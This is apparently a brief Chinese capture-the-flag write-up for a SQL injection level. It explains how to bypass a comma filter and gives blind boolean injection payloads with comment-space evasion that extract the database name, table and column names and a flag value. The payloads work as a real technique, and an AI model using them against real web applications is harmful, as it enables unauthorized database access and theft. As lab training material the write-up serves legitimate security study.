判断注入类型 1# 正常返回数字型 本关卡将,过滤 绕过方法:
1.将limit 0,1样式改为limit 1 offset 0。
2.将substr(string,1,1)改为substr(string from 1 for 1)
查库 id=-1/**/or/**/ascii(substr(database()from1for1))=119
查表 id=-1/**/or/**/ascii(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/1/**/offset/**/0)from/**/1/**/for/**/1))=102
查列 id=-1/**/or/**/ascii(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name="flag"/**/limit/**/1/**/offset/**/0)from/**/1/**/for/**/1))=102
查字段 id=-1/**/or/**/ascii(substr((select/**/flag/**/from/**/flag/**/limit/**/1/**/offset/**/0)from/**/1/**/for/**/1))=102